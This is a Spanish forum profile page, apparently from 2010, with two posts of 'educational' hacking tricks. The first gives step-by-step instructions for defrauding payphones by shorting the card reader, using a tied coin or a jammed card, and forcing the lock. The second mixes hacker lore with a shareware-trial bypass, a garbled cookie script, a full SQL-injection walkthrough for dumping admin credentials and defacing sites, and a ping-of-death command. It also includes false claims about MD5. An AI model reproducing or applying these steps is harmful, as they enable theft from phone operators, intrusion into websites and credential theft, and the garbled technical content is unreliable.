bepbrian

Usuario (México)

Primer post: 9 jun 2010Último post: 10 jun 2010

Posts

Puntos totales

Comentarios

Ciencia EducacionporAnónimo6/9/2010

Hola Taringeros! Bueno pues este es mi primer post, espero les ayude y OJO pongo este post con fines informativos y de educacion, no me ago responsable del mal uso de la informacion ni estoy fomentando la pirateria cibernetica. espero comenten y dejen puntos para seguir posteando ok PRIMER TRUCO Este truco requiere una gran atención por parte del phreaker, asi que estate atento. Se puede hacer mucho mas facilmente, pero ya que lo vas a hacer, hazlo profesionalmente. Necesitas: · Un diskette estropeado. · Una moneda ( de 50 centavos en adelante). · Un reloj. Instrucciones: Cojes el diskette y le arrancas la chapa metalica. Nos queda como una minitarjeta, a partir de ahora se llamara tarjeta ESP-ecial.. Recomiendo que le pongais algun aislante a la parte donde la sujetais, porque da calambre. Ahora vas a una cabina TM. Descuelgas y metes la tarjeta ESP-ecial de manera que el lado metálico queda a la derecha. Atención: La tarjeta no se metera entera porque esta el seguro, esto no importa, lo que importa es que la parte metalica entre un poco en la ranura. Al entrar notareis que se ha cortado la comunicación. NO suena nada... Ni tono ni ruido ni nada. Si ha pasado eso: La cabina es válida!!!! Nota: No se debe oir nada y el display se ira desvaneciendo poco a poco. Que hacer ahora? Bien, sacas la tarjetita, cuelgas, te das un paseo o te comes un helado o lo que quieras... Cojes una moneda de lo que sea. La metes y llamas, hablas con quien sea. Ahora, antes de que se corte la comunicación (por falta de dinero) debes meter la tarjeta, con ello se corta la llamada, asi que despidete antes... Tambien se puede hacer pulsando rellamada, con lo que se corta la comunicacion, no se traga aun el dinero, y puedes meter la chapa mas tranquilo despues. Al meter la tarjeta se va desvaneciendo el display. A partir de meter la tarjeta debes esperar 2`30``. Cuando pase ese tiempo saca la tarjeta ESP-ecial y ahora cuelgas y descuelgas unas cuantas veces. A las pocas veces de hacerlo la cabina de despertara y pondra en el display "ESPERE". Pues, por una vez vamos a hacerle caso, colgamos el microtelefono y esperamos 2'30''. Pasado el tiempo descolgamos y entonces oiremos un ruido, ya esta, la moneda que introducimos para hablar ha caido en el cajetín. Empezad probando con una moneda de 25 centavos para cojerle práctica e id pasando despues a 100, 200 y 500 ptas. Ante todo no os pongais nerviosos. Consejos: No toqueis la chapa cuando esta metida. Da calambre No abuseis ni tengais conversaciones comerciales, no me extrañaria nada que la T se diera cuenta de cuando se hace el truco y grabara las conversaciones. (Si fuera mi empresa yo lo haría) Tambien podeis hacer el truco con una chapa de botellines. Explicación de lo ocurrido: Al llamar a un telefono, si echamos una sola moneda, la cabina no se la traga hasta que se corta la comunicación, ya sea porque el otro terminal cuelgue o porque el crédito se acabe. Mientras hablamos la moneda queda guardada en una sección de la cabina que tiene 8 ranuras (una para cada moneda) y que deriva a dos partes, una es el cajetin de devolución (por si no se ha usado la moneda) y el otro va hacia la caja de monedas de la cabina (ese cajon que hay debajo del telefono). bien, al meter la chapa en la ranura de las tarjetas se hace un cortocircuito en la cabeza del lector magnético, con lo que se genera una caida de tension con sus consecuencias. La cabina se va apagando. A los 2'30'' los condensadores han perdido toda la carga y la cabina esta literalmente muerta, pero la moneda aun sigue en esa sección intermedia, porque no ha recibido orden de meterse en la caja de monedas. Al descolgar la cabina lo que hacemos es reanimarla, y por eso nos dice ESPERE, por que esta reiniciandose. Tarda para ello otros 2'30'', para compensar. Una vez que descolgamos el teléfono la cabina se reinicia y abre la compuerta de devolucion de monedas, con lo cual esta cae al cajetin. ¿Por que abre el conducto hacia devolución de monedas y no hacia la caja?, esto es sencillo, cuando echamos una moneda antes de que la cabina este lista (mientras pone Telefonica UT 8,3) nos devuelve la moneda porque ese el conducto abierto. No estaria bien que la T se quedara con las monedas que echa la gente con prisa. Por lo tanto, para que no se traguen las monedas, las cabinas abren ese circuito al iniciarse, lo que hace que cualquier moneda que se introduzca (o que ya estuviera, jeje) cae al cajetin de devolución. SEGUNDO TRUCO Sirve para hacer que suene cualquier teléfono sin echar dinero alguno en la cabina, lo malo es que al descolgar el otro telefono se corta la comunicación, por eso mas que un truco es una curiosidad. Hace algun tiempo habia uno que servía para esto, pero esta depurado en casi todas las cabinas. Práctica: 1. Llamas a un numero que no existe (por ejemplo del rango 900 999 9xx) y te sale la lata diciendo que no existe... 2. Esperas a que se calle la lata, ahora quedan unos tonos intermitentes 3. Pulsas * 4. En el display pondrá datos, esperas a que terminen los tonos. 5. Sonará como si la cabina se reiniciase y ahora tendrás tono para marcar. Utilidad: Para comprobar si un celular esta conectado, a veces llamamos y no queremos dejar un mensaje en el contestador o es que ni siquiera tiene contestador, asi comprobamos que no se va a tragar la cabina nuestro dinero. Para llamar al 015 (Información Retevisión) ya que en las cabinas pone "Servicio no disponible" no tienen información sobre la tarifa de esta, y no se corta. Para gastar una broma... PD: No funciona en todas las TMs, pero si en la mayoría TERCER TRUCO Material: -Moneda de 1 peso(con una de 1peso es suficiente para practicar) - Moneda de 25 centavos. - Pedaso de hilo/cuerda lo mas fino y resitente posible. Este truco sirve SOLO en las cabina en las que no han puesto el sistema nuevo de introducir la moneda apretando el "boton". Procedimiento atar la moneda de 25 centavos por el agujero a la de 1 peso (a las que previemente se le habrá hecho un par de finos cortes 2 extremos de la moneda para asi poder atarla). Introducimos la moneda de 25, la cual inmediatamente cae (ya tenos el hilo/cuerda por dentro de la cabina), ahora metemos la de 1 peso y hablamos... cuando quede poco, nos despedimos y colgamos, tirando suavemente del hilo, hasta que notamos que la moneda cae y tiramos de la cuerda para que la monena vuelva a salir atada Descolgamos el tm y nos da linea. Metemos la chapa para cortar -> esto es bueno para algunos -> la chapa (o cualquier otra cosa metalica) debe tocar la cabeza metalica lectora de banadas magneticas (en la ranura de tarjetas, al principio, a la derecha y abajo) -> y cuando no se oiga linea ya has "cortado". --> Si al meter la chapa no corta, solo se oye estatica, pues dejas la chapa como se supone que deberia estar y con el cable del microtelefono (ese gris metalico con anillos enroscados ) tocas en la parte metalica (gris) que es lo de las tarjetas y deberia cortar en la mayoria de las cabinas que con solo la chapa no lo hace, osea deberas tener la chapa puesta y con el cable ir juntandolo a la parte metalica para cortar. Meter la chapa por donde indica el circulo rojo: Pues eso, habiendo cortado sin oir linea, marcador 083 y esperamos a queponga DATOS en el display -> tambien se podria marcar cualquier otro numero gratuito (1004, 1002, 900) + la tecla bandera, es solo para engañar al tm y que se crea que no debe tarificar. Una vez ponga DATOS en el display, sacamos la chapa o despegamos el cable, y deberemos volver a oir linea. Esa linea nos permite llamar a donde queramos... NO, hay que currarselo un poco mas. Ahora marcamos el numero de telefono al que queremos llamar como desde casa . Y llamara, pero hay que tener en cuenta que en cuanto nos delcuelguen se cortara, y el tm se reiniciara porque no tiene pelas. -> Para que no se corte, en el preciso instante que descuelguen, la chapa debe estar introducida y cortando para que no cobre ese paso. Los pasos transcurren cada determinado tiempo dependiendo del tipo de llamada, pero cronometrandolos y viendo cuando se corta se puede ir predeciendo cuando va a cortarse, entonces solo hay que meter la chapa unos segundos antes de que llegue a ese tiempo en el que se va a cortar, entonces con la chapa dentro y cortando la linea y llegue el momento de cobrar, el tm se reiniciara. El reinicio: varia mucho de un tm a otro, normalmente la cabina hace un ruido con el validador de monedas, se borra el display y aparece lo de TELEFONICA y demas como cuando descuelgas, en el momento que te salga lo de MARQUE NUMERO, sacas la chapa, y como comprabaras la comunicacion no se ha cortado, pero tampoco puedes hablar porque el microtelefono esta descativado. Para activar el microtelefono solo debemos pulsar dos asterisco **. -> Se pueden pulsar en cualquier momento, mejor cuando la chapa esta dentro para que no suenen y la gente no se mosquee. El tiempo en que la chapa se encuentra dentro, la otra persona oye estatica, y se mosquean aun mas XDD, sobre todo al principio cuando pregunta "¿Quien?" y tu estas esperando que reinicie el TM para contestarle. Asi que una vez hayas pillado los tiempos es cuestion de mientras estes hablando controles el cronometro para saber cuando hay que meter la chapa y esperar que reinicie el TM para seguir hablando. Para acabar de hablar cuelgas y te largas. Cosas raras Algunos TM no reinician, asinque solo hay que sacar la chapa y ya puedes hablar. Algunos muestran el mensaje de FUERA DE SERVICIO y se reinician dos veces seguidas, no problem, lo unico que tienes que esperar mas tiempo antes de seguir hablando. Algunas se descargan demasiado cuando tienen la chapa dentro, asi que no es recomendable tener la chapa mucho tiempo dentro porque se ira al pedo, normalmente nos avisara con un ESPERE. En algunos casos al reiniciar, por extraños motivos, no te dejara marcar los **, simplemente marca 00 y resuelto . En la mitad de España, las cabinas al descolgarse suena una especie de carrier para que le den acceso a la RTC, en esas el metodo varia, en algunas no funcionara ni de coña y en otras si, pero mediante procesos que desconozco, bueno los hay pero como no los se explicar exactamente de momento, prefiero no hacerlo y esperarme, asinque buscaros cabinas sin carrier . ATENCION: Toda la informacion que se encuentra en esta pagina es solo para fines educacionales, todo acto delictivo que se haga con esta informacion sera cosa tuya y JGD no se responsabiliza de su uso. A si que mucho ojo con lo que hagais con esto, y si os cojen luego no digais si me lo dijo JGD (porque esta informacion es para que aprendais mas) Trucos para no pagar en las cabinas AVISO AL NAVEGANTE La mayoria de la información aquí publicada se trata de recopilaciones de paginas web que podras encontrar en la red.Lo edito con el propósito de que esa información educacional pueda llegar hasta cualquier rincón del espacio cibernético. CUARTO TRUCO PARA CABINAS NUEVAS DIGITALES VERDES PEQUEÑAS (DISPLAY GRANDE) Estas son fáciles de pufear si están en un sitio no muy vigilado (estación de FFCC, autobuses, hospitales, bares grandes, etc). * Deberán tener su roseta telefónica RJ-11 a la vista, sino a joderse. * Para llamar gratis: * Descolgar el teléfono. Fijaros que nadie os mire, e introducir por la ranura de las monedas una tarjeta de visita doblada por la mitad ó un cartón de más o menos el mismo largo. (Nota para torpes: NO metas tu propia tarjeta o la de alguien conocido. Si se te atasca, la has cagado, idiota). * Ibamos en el cartoncito. Bueno, lo meteis hasta el fondo :-)notareis que activa un sensor. Ahora, CON LA TARJETA METIDA,colgais el teléfono y descolgais. Si habeis sido buenos y habeis seguido las instrucciones en el display de la cabina os saldrá un mensaje del tipo 6.42 Simbolos raros y UN ASPA (X) grande. * Bien, ahora marcais un número como el 1002/1003. Antes de que os salga el 'le atiende la posición XXXXXX' quitad el Jack de la roseta y volverlo a meter. Por el auricular oireis el tono de llamada. * Si ahora pulsais la tecla MF (Multifrecuencia) ya podeis marcar a donde querais.... gratis. * Que no os suponga cargo de conciencia hacerlo :-), que debido a este fallo en el diseño, que la puta Timofónica no admite, los cargos de las llamadas las acaba pagando la Cía. :-D :-D * Ah!! Un último consejo, tapad con la mano el display para que nadie que pase se mosquee y echad alguna vez alguna monedita (que os devolvera, je,je) para hacer el paripé. QUINTO TRUCO Tiene que ser uno de esos verdes como los que ponen en los bares, y tienes que tener acceso a la roseta para poder desconectar la línea. La cosa es meter algo de pelas (con un duro basta) e ir colgando muy poco a poco, hasta que se acabe de colgar. Entonces sueltas y te saldrá en el display una cabina tachada. Entonces, llamas al 1003 y enseguida que lo cogen desenchufas la línea de la roseta y la vuelves a enchufar. Entonces, rápido, le das la la tecla MF (Multi-Frecuencia) y marcas rápidamente. Puedes hablar todo el tiempo que te de la gana, y luego, cuelgas un par de veces y te devuelve las pelas que hayas metido! Hay otra manera con un cartoncito, pero esta canta menos y se obtienen los mismos resultados! SEXTO TRUCO Este truco era un poco bestia pero funciona, lo unico es que se tiene que tener un poco de fuerza y practica. Eso solo sirve para las cabinas verdes de plastico (que creo que ya no se ponen, solo estan en los bares). Pues consiste en levantar la tapa verde donde hay la configuracion de tonos... (creo, vaya,...esta situada en donde se cuelga el telefono), coger un destornillador (es muy escandaloso, pero solo hay que hacerlo una vez), colocarlo en la ranura de la cerradura y meterne un hostia impresionante, tiene que sonar un chasquido, como si te hubieras cargado la cerradura, pero lo que has hecho en realidad es hundir la cerradura(casi ni se nota), luego con un poco de habilidad la giras hacia la derecha o izquierda (es lo mismo). Comprueba apretando en el centro de la cabina como da linea (Si, Si, lo que se ha conseguido es que la cerradura hace contacto con algo de la placa y da linea. Ya esta!!! . Se puede usar de 2 formas distintas: la primera es que si tienes 20 duros, perfecto, haces la llamada a la novia, y cuando estas haciendo la llamada (antes que descuelgue el que estas llamando) aprietas el plastico, y en la pantalla te va a salir de credito 0pts y se te va a ir incrementando y la señal de "caja fuera de servicio" . La segunda es que si no tienes moneda, pues una postura comoda y discreta es apoyarse con el codo en el plastico y ya esta, ya hay linea, pero ya veras como es incomodo. No me preguntes hasta cuanto llega el credito, porque nunca he llegado "al final" (si es que hay). Ya lo comprobaras tu!! jejeje..... MoviStar ha puesto en funcionamiento el servicio aviso de llamadas, por el cual si un usuario de esta compania recibe una llamada si su móvil esta apagado o fuera de cobertura, al encenderlo recibirá un SMS indicando el número de teléfono que le ha llamado. Para activarlo basta con una simple llamada al número 200 y para desactivarlo al 217 COMO HACER QUE CUANDO NOS INTERESE SE ESCUCHE UNA LOCUCIÓN "el numero marcado no existe" CUANDO SE RECIBE LLAMADAS DE PESADOS... Para Movistar Plus y Movistar Activa 1. Paso: Pones en tu móvil **67*6193444479# y pulsas la tecla de llamada de tu móvil 2. Paso: Pones *43# y pulsas la tecla de llamada 3. Paso: Cuando recibes la llamada del "pesado" pulsas el botón de rechazar llamada o el botón de colgar y a continuación el que está llamando recibe la locución "El teléfono al que usted llama tiene restringido temporalmente las llamadas entrantes" Para desactivar este servicio debes poner ##002# y la tecla de llamada. Aparecerá en la pantalla, "desvío anulado" COMANDO PARA MENSAJES CORTOS ENVIADOS A TRAVES DEL CENTRO DE MENSAJES (+34609090909) *N# Para mandar mensajes cortos y que te notifique si ha llegado al terminal que lo has enviado (te dice si esta encendido o apagado) al escribir el mensaje se pone *N# y a continuación el texto del mensaje, al enviarlo el centro de mensajes te envia un mensaje con la notificacion de si el mensaje ha sido entregado. *O# Para enviar mensajes cortos anonimos. *P x# Si quieres retrasar la recepcion del mensaje enviado, la x es las horas que se quieren retrasar. *O*N# Para enviar el SMS anonimo y a la vez te notifique el mensaje enviado. *O*N*P x# Para enviar el SMS anonimo, a la vez te notifique el mensaje enviado y a la vez retrase la recepcion del mensaje. *POST-H# .Mensajes en diferido..Donde el simbolo _ representa un espacio en blanco y la letra N el numero de horas que se desea que trascurran antes de efectuarse el envio. Ver IMEI: Presionar *#06# EFR: ###119#1#, (OK) Para activar el modo EFR ###119#0#, (OK) Para desactivar el modo EFR Bueno pues ese fue mi post espero sirve de alguna informacion y no me ago responsable del mal uso que hagan de esta informacion, comente porfavor y dejen puntos. perdon si mi post es pobre en imagenes pero eso no importa mucho lo valioso es la informacion, gracias

el hacking y el deface??? algunas dudas.

Ciencia EducacionporAnónimo6/10/2010

hola e aqui mi segundo post en donde se aclaran algunas dudas acerca del hacking que creo un usuario y yo entrabamos en desacuerdo con nuestras opiniones jeje. Entonces que es un Hacker?. Si hacemos esta pregunta a alguien de la calle, probablemente conteste con un insulto. En nuestro país este fenómeno no es bien conocido muy bien todavía.Los verdaderos Hackers nunca comentan nada de sus trabajos y si lo hacen, suelen utilizar apodos para no ser descubiertos. Si es un principiante, solo deseara recopilar información y lo copiara. Estos individuos se llaman LAMER y son rápidamente expulsados de los heroicos guerreros de la red. Existen al menos cinco tipos de Virus conocidos hasta ahora, esto no quiere decir que están todos, seguramente mientras escribo estas líneas habrá surgido algún que otro engendro mas sofisticado. Pero básicamente son estos : * Virus de arranque o Virus de Boot. * Virus de Macro. * Virus de ficheros. * Virus polimorficos. * Virus multiparte. El perfil del Hacker Un perfil idóneo prácticamente no existe, pero si un acercamiento. El Hacker es alguien compulsivo y obsesivo por acumular conocimientos. Es extrovertido e investiga todo lo relacionado con la electrónica y la informática. Es el tipo de personas que suelen abrir todos los aparatos de consumo de casa o lee los ficheros de su ordenador hasta modificarlos para ver que sucede. Un buen Hacker se apunta lo aprendido y no lo difunde con una sonrisa de oreja a oreja, como un idiota. Se calla. Es mejor para poder proseguir. Si es cierto que al Hacker, le entusiasma todo lo que rodea la tecnología, la telefonía celular, los ordenadores, las tarjetas de credito electrónicas o los Satélites. Normalmente lee demasiadas revistas y estudia pesados libros de técnica Los gurus Son los maestros y enseñan a los futuros Hackers. Normalmente se trata se personas adultas, me refiero adultas , porque la mayoría de Hackers son personas jóvenes, que tienen amplia experiencia sobre los sistemas informáticos o electrónicos y están de alguna forma hay, para enseñar a o sacar de cualquier duda al joven iniciatico al tema. Es como una especie de profesor que tiene a sus espaldas unas cuantas medallitas que lo identifican como el mejor de su serie. El guru no esta activo, pero absorve conocimientos ya que sigue practicando, pero para conocimientos propios y solo enseña las técnicas mas basicas. SON SEGURAS LAS PAGINAS WEB SOBRE HACKING Algunas de ellas pueden resultar peligrosas e inseguras, pero no todas. Es cierto que las paginas sobre Hacking, pueden resultar una muy buena fuente de información para los « novatos «, pero existen algunas paginas, creadas por personas con vagas intenciones, que colocan en ellas utilidades dañinas como Virus o cookies ES SEGURO EL CORREO ELECTRÓNICO En absoluto, el correo electrónico no es nada seguro. A través de el se pueden recibir ficheros « pegados « indeseables. Además el correo electrónico puede ser interceptado y leído por los Lamers, que emplean Sniffers, programas capaces de interceptar correo electrónico entre otros. QUE HERRAMIENTAS SON IMPRESCINDIBLES PARA EL « HACKER « El Hacker necesita herramientas que le faciliten el trabajo en la red. Entre estas herramientas destacan los sniffers, escaneadores y programadores de tarjetas inteligentes. También se recomienda poseer algún Mailbombing y Nukenabber para enfrentarse a aquellos que solo actúan por fastidiar. tambien un buen virus bajo la manga La ingeniería social es quizás la base de un Hacker, para obtener los datos o lo que le interesa por medio de una conversación y de personas El truco de Simply es hasta la fecha el mas sencillo y el mas elegante hasta la fecha. Este truco se puede hacer de forma manual o automática, esto es, a través de Software o Hardware. Hasta la fecha en que se están escribiendo estas líneas, este truco ha conseguido burlar perfectamente cualquier tipo de contador DSS o similar, ya que se trata de “ congelar “ el tiempo del reloj fuera de los ficheros INI y no registrarlos. Dicho de otra manera, antes de arrancar el sistema operativo hay que introducirse en la BIOS y modificar la fecha, guardando siempre relación. Esto quiere decir que si se bloquea el día 5, el ordenador siempre deberá registrar que esta en el día 5. Como se sabe, los contadores pueden detectar cambios inferiores de fecha, pero no igualdades, y como hasta la fecha no se controla la hora y los minutos, el truco esta servido. Con este método han caído todos los últimos programas del mercado hasta la fecha, palabra. Nota : No se pretende promocionar el truco Simply ni ninguno de los expuestos en este capitulo, de modo que quien lo ejecute quedara a responsabilidad suya el “ trequear “ el Shareware y de nada responde el autor o autores de esta obra, el empleo de este truco u otros descritos. Al no existir copia ni animo de lucro, no existe piratería. Queda dicho. ahora mostraremos algunas formas de encriptacion bastante utiles * MD5.....este algoritmo esta desarrollado por el grupo RSA y es un intento de probar con otros sistemas criptográficos que no empleen claves. El algoritmo desarrollado es capaz de obtener 128 bits a partir de un determinado texto. Como es lógico hasta el momento no se sabe cuales son las operaciones matemáticas a seguir, pero hay alguien que dice que es mas que probable que se basen en factores de números primos. postada no les digan a nadie pero son secuencias en primos en factor euler ahora esto les gustara Espiaremos una comunicación primero sin usar ningún tipo de protección y después con un cliente SSH. Primero dejamos nuestro sniffer escuchando todos los paquetes TCP nuestra propia red. Y nos loggearemos a una cuenta de Messenger usando un servicio en línea como ebbudy o la que gusten y analizaremos el trafico. Terminando de loggearnos checamos el Logg file que se crea al marcar la casilla de “Enable Loggining”, y busquemos entre sus entrañas. Después de buscar un rato en los paquetes TCP, nos encontramos con una linda cookie que crea ebuddy al loggearnos. Como verán esta mi mail tan claro como el agua (el cual es falso jiji) y un lindo hash con la contraseña, que por lo menos ahora viajan en hash, en el primer Messenger que saco Yahoo no hacia ni eso… Esto no aclara el hecho que es importante que nadie pueda husmear en la campo data de nuestros paquetes, digo es como si mandaras cartas y cualquier cartero pervertido pudiera ver lo que dice sin ningún inconveniente. Ahora hagamos lo mismo pero usaremos el putty para conectarnos a un servidor SMTP usando el Secure Shell Observando uno de los paquetes nos damos cuenta que el campo data no es comprensible ya que esta encriptado, lo cual pone mas difícil las cosas, dependiendo del cliente/servidor la comunicación estará encriptada en RSA de 64,128, 256 o hasta 1024bits XSS es un ataque basado en la explotacion de vulnerabilidades del sistema de validacion de HTML incrustado Sucede cuando hay un mensaje o una ruta en la URL del navegador o en una cookie. Para saber el contenido de una cookie, sin usar ningun tipo de iecv o addin para tu navegador, puedes usar el siguiente script de jasildbg. Solo coloca TODO lo que esta en color negro en la barra de direcciones, y presiona Enter. Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la cookie se borrara. el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña. Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y escribe otra cosa: javascript:for(var g in document.cookie.split (';'))void(prompt("Valor de cookie "+document.cookie.split (';').split (’=')[0],document.cookie.split(’;').split(’=')[1]));alert (”Cookies:n”+document.cookie.replace(/;/,”rn”)); Una vez dentro se puede modificar la cookie a tu antojo. Si pones cancelar la cookie se borrara. el uso de la libreria cURL un usuario malintencionado, podria al recibir tu cookie, entrar a la pagina, y dejarla en cache, para que el atacante cuando quiera, pueda entrar como tu, sin siquiera necesitar tu contraseña. Este codigo (muy peligroso) borra todo el contenido de la pagina en cuestion, y escribe otra cosa: ¿Qué es Deface? El Deface / Defacing / Defacement es la modificación de una página web sin autorización del dueño de la misma. Primero hay que tener un buen dorks SQL, por ejemplo. “allinurl: .php?id= “ Sin las comillas. Ese Dork es el más básico pero hay muchísimos más, todo es con tal de ir mirando. Bueno ya hemos encontrado una, www.web.com/noticia.php?id=34 Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerle ‘. Quedaría a si: www.web.com/noticias.php?id=’ Si nos sale un error mysql , tipo este ; Warning: mysql_error(): supplied argument is not a valid MySQL-Link resource in /usr/home/xxxX/public_html/_sys/general_functions.php on line 5 Lo principal es; -1+union+all+select+0,1 Quedaría así ; www.web.com/noticias.php?id=-1+union+all+select+0,1 Ara toca ir buscando, hasta que se te quite los errores, y te salgan números. Para ir buscando tienes que ir añadiendo números , ejemplo: www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7-- Siempre al final de cada numero pon “--“ [Dos guiones] sin las comillas. No siempre acaba en 7, puede acabar en 100, 200, quien sabe. A mí, me ha salido los números en 7, y me ha tirado el 4, 6 y 7. Ahora toca coger uno de ellos, el que sea, yo cojo el 4. Ara tenemos que hacer lo siguiente: Si as elegido el 4, borras el numero 4 y pones “table_name” sin las comillas y al final pones; +from+information_schema.tables— Y nos quedaría a si: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables — Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normal mente sale al principio. Ara nos toca buscar tablas como “admin, root, login, miembro, member, user, usuario, administrador, etc. “Y aviso, no es lo mismo admin que Admin. Me explico, a lo mejor con admin no te sale y con Admin sí. Para buscar las tablas tienes que borrar los dos guiones finales y poner ; +1,1-- Y ir cambiando el primer 1 por los siguientes números, ejemplo: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 1,1-- www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 2,1-- www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+ 3,1-- A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno, nunca se sabe. A mí me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente: Borras +information_schema.tables+3,1-- , quedara a si: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from y pones +admin , pones admin por que es la tabla importante que te ha tirado, quedaría así: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin & ara en table_name hay que ir probando palabras como; “Login, admin, password, clave, pass, user, email, mail , etc... “ Quedaría a si: www.web.com/noticias.php?id=- 1+union+all+select+0,1,2,3,admin,5,6,7+from+admin A mí el user me lo ha tirado en “admin” y la contraseña en “clave”. Ahora borras lo que has puesto en 4, y pones : concat(nombre,0x3a3a,pass) Quedaría a si: www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3, concat(admin,0x3a3a,clave),5,6,7+from+admin Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: en hexadecimal y clave es la tabla donde nos a tirado el password. Y Listo ya tenemos usuario y password. Ahora toca buscar el panel Ping De La Muerte. Esta tecnica no es propia de un Hacker ya que unicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo os quiero decir que aunque aqui os lo explicare no es cuestion que lo useis por Internet atacando servidores. ping muy grande y producira su caida. Para ejecutar este ataque solo tenemos que escribir : c:>ping -l 65510 victima.com Whois. La utilidad Whois, al igual que Finger es muy comun en Unix y no esta disponible en Win95/98 pero comos somos asi de listos saldremos del apuro. Tambien sirve para pedir informacion de un servidor pero no el igual que Finger, ya que se diferencian en el tipo de informacion, el finger se suele utilizar mucho para buscar direcciones de correo mientras que el Whois, para averiguar informacion sobre un servidor en concreto. Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un host muy especial: c:>telnet whois.internic.net Por supuesto Internic, una empresa privada norte ameriacana que se encarga de controlar los dominios de Internet, y podemos usar su base de datos para pedir informacion sobre un servidor. Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_ del_servidor" y nos sacara la informacion. Winipcfg. Ejecutando este comando, nos saldra una ventana windows informandonos de los diferentes valores de nuestra red. Realmente util para verificar la configuracion. Encriptando Nuestro Correo. Conviene encriptar nuestro correo, sobre todo si esta relacionado con el hacking, ya que asi nadie podra saber que pone y acusarnos de nada. Siempre podemos alegar "Privacidad en los Datos" . Al igual que antes hay varios paquetes de PGP para mail. Sugerencias Para Un Mejor Hacking. Aqui hablare sobre algunas ideas que pueden potenciar el hacking en Win95/98 y la creacion de nuevas herramientas. - Programas troyanos que capturen el password del acceso a Internet. - Programas para IP-Spoof. - Creacion de herramientas de redes para Win95/98. - Wardialers. - Programas para atacar otros Win95/98 (DoS). - Nuevas Suites. - Programas crackeadores del passwd. - Programas criptograficos. - Programas eliminadores de ficheros de forma segura. - Puertas traseras. Liberar memoria RAM Liberar memoria RAM. Tras haber ejecutado una o múltiples aplicaciones o juegos que hagan uso intensivo de los recursos del sistema, habremos detectado que Windows queda algo "tocado", mucho mas lento. Esto es debido a que los restos de las aplicaciones bloquean parte de la RAM que han utilizado, ocasionando lo que se llama "fragmentación de memoria". Mediante un pequeño script podemos liberar esa memoria , forzando al ordenador a descargar el contenido de la memoria al archivo de intercambio de forma que recargue de nuevo toda la información activa en la memoria y deseche la información no útil, esto lo haremos de la siguiente forma: Abrimos el bloc de notas de Windows y dependiendo de la memoria de nuestro ordenador escribiremos los siguientes valores: Si tienes menos de 128 Mb de memoria RAM, escribes Mystring=(16000000) Si tienes 128 Mb de memoria RAM o más escribes Mystring=(80000000) Ahora guarda este archivo en el lugar que quieras, con el nombre "liberar.vbe" (no te olvides poner la extensión .vbe ya que el nombre no importa puedes poner el que quieras). Ahora hacemos doble clic sobre el archivo que acabamos de crear y windows refrescará la memoria RAM. Mayor velocidad de acceso a los programas Aunque tu equipo disponga de suficiente memoria RAM y puedas trabajar con varios programas sin problemas el sistema siempre utiliza el Kernel para enviar y recibir archivos del archivo de paginación del disco duro, por este motivo la velocidad del ordenador se frena, si ya dispones de memoria RAM suficiente sigue estos pasos: Haz clic sobre el botón Inicio y a continuación sobre Ejecutar, escribe regedit y pulsa el botón Aceptar Ahora te desplazas por la siguiente cadena: HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager/Memory Management Busca en el panel derecho la entrada DisablePagingExecutive y haz doble clic sobre ella. En la ventana que aparece cambia el valor de 0 y pones 1 luego pulsa el botón Aceptar y reinicia tu ordenador, ahora conseguirás mas velocidad de acceso a los programas porque utilizará menos el disco duro. Arrancar y Apagar mas rápido el PC Conseguirás rapidez en el arranque y apagado de tu ordenador, siguiendo los pasos que a continuación te proponemos: Haz doble clic sobre "Mi PC" Entra en la unidad C Selecciona el menú "Ver/Opciones" Selecciona la pestaña "Ver" Selecciona todos los "Archivos/Aplicar" Haz un clic sobre el botón derecho sobre el archivo MSDOS.SYS Después, ves a "Propiedades" y elimina la marca de "sólo lectura y oculto/Aplicar" Selecciona el archivo y ábrelo con el bloc de notas Sobre "Opciones" ya sólo tendrás que escribir BootDelay=0 Finalmente, ponle los atributos de "sólo lectura y oculto". Eliminar archivos que no se dejan borrar Con frecuencia nos encontramos que al intentar borrar un archivo, XP nos contesta que no se puede eliminar porque el archivo está siendo usado por otro programa, este problema suele ocurrir cuando intentamos borrar archivos en formato *.avi. Normalmente el problema suele estar producido porque algún avi está dañado y el codec correspondiente (el cual se invoca siempre en vista previa) se cuelga y no lo suelta. Recordad que AVI no es un tipo de fichero, sino que es un "contenedor" de formato de video, y que en la cabecera interna, lleva realmente grabado el tipo de video que es y por tanto el sistema sabe a que codec debe llamar. Para solucionar este problema abriremos una ventana de comandos Hacemos clic en el botón inicio y luego sobre Ejecutar A continuación escribimos cmd y pulsamos el botón Aceptar Cerramos todos los programas que tengamos abiertos menos la pantalla de MS-DOS que acabamos de abrir. Volvemos ha hacer clic en el botón Inicio y luego sobre Ejecutar Escribimos Taskmgr.exe y pulsamos el botón Aceptar Volvemos a pulsar el botón Inicio y luego sobre Ejecutar Escribimos explorer.exe y pulsamos el botón Aceptar. Volvemos a la ventana de comandos e iremos a la carpeta donde tengamos el archivo que queremos eliminar y escribiremos: del dejamos un espacio y escribimos el nombre_archivo Volvemos de nuevo al administrador de tareas, Archivo > Nueva tarea y escribimos "explorer.exe" (sin comillas) para reestablecer el escritorio. Ya podemos cerrar el administrador de tareas y la ventana de comandos. Atajos del teclado 